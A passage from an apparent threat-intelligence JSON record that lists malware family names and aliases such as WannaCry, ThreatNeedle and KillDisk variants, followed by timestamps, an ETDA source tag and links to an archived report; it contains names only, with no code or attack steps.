"SimpleTea", "SimplexTea", "SmallTiger", "Stunnel", "TAINTEDSCRIBE", "TAXHAUL", "TFlower", "TOUCHKEY", "TOUCHMOVE", "TOUCHSHIFT", "TOUCHSHOT", "TWOPENCE", "TYPEFRAME", "Tdrop", "Tdrop2", "ThreatNeedle", "Tiger RAT", "TigerRAT", "Trojan Manuscript", "Troy", "TroyRAT", "VEILEDSIGNAL", "VHD", "VHD Ransomware", "VIVACIOUSGIFT", "VSingle", "ValeforBeta", "Volgmer", "Vyveva", "W1_RAT", "Wana Decrypt0r", "WanaCry", "WanaCrypt", "WanaCrypt0r", "WannaCry", "WannaCrypt", "WannaCryptor", "WbBot", "Wcry", "Win32/KillDisk.NBB", "Win32/KillDisk.NBC", "Win32/KillDisk.NBD", "Win32/KillDisk.NBH", "Win32/KillDisk.NBI", "WinorDLL64", "Winsec", "WolfRAT", "Wormhole", "YamaBot", "Yort", "ZetaNile", "concealment_troy", "http_troy", "httpdr0pper", "httpdropper", "klovbot", "sRDI" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434163, "ts_updated_at": 1775792299, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/db4d393ec942e8a3c1c3ce18eef66051aa214a1c.pdf", "text": "https://archive.orkl.eu/db4d393ec942e8a3c1c3ce18eef66051aa214a1c.txt", "img": "https://archive.orkl.eu/db4d393ec942e8a3c1c3ce18eef66051aa214a1c.jpg" } }